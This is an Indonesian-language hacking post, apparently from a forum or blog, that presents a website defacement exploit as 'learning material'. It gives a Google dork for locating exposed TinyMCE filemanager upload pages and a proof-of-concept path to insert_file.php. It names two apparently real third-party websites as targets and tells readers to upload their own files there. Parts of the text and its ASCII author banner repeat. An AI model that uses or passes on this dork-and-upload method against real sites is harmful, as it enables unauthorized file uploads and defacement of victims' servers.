saya ingin memberi beberapa Exploit yang menarik untuk di jadikan pembelajaran Deface.
Langsung saja kita bahas bersama.
Langsung saja kita bahas bersama.
Dork:
- inurl:filemanager/insertFile/
*Use Your Head for many target
- inurl:filemanager/insertFile/
*Use Your Head for many target
_____________________________________________
/ \
| author: BadBoy |
| E-mail: fikri-badboy@asia-mail.com |
| copyright: 2010-2011 |
| Page:http://www.facebook.com/fikri.badboy |
\_____________________________________________/
| | |
|_ | _|
| | |
|__|__|
/-’P'-\
(__/ \__)
/ \
| author: BadBoy |
| E-mail: fikri-badboy@asia-mail.com |
| copyright: 2010-2011 |
| Page:http://www.facebook.com/fikri.badboy |
\_____________________________________________/
| | |
|_ | _|
| | |
|__|__|
/-’P'-\
(__/ \__)
POC / Exploit :
http://[localhost]/Patch/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Setelah itu, maka akan tampil gambar berikut.
Saya memberi beberapa target ny hehe
- http://www.verslogalimybes.lt/javascript/libs/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
- http://www.financialmilestones.com.au/wse/tinymce/jscripts/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
hehe- http://www.verslogalimybes.lt/javascript/libs/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
- http://www.financialmilestones.com.au/wse/tinymce/jscripts/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Upload file kalian, lalu liat deh hasilnya
Preview ny bisa dilihat kalo sukses upload ny.
Preview ny bisa dilihat kalo sukses upload ny.
Okay segitu aja dulu ya
Good Luck ^^
Good Luck ^^
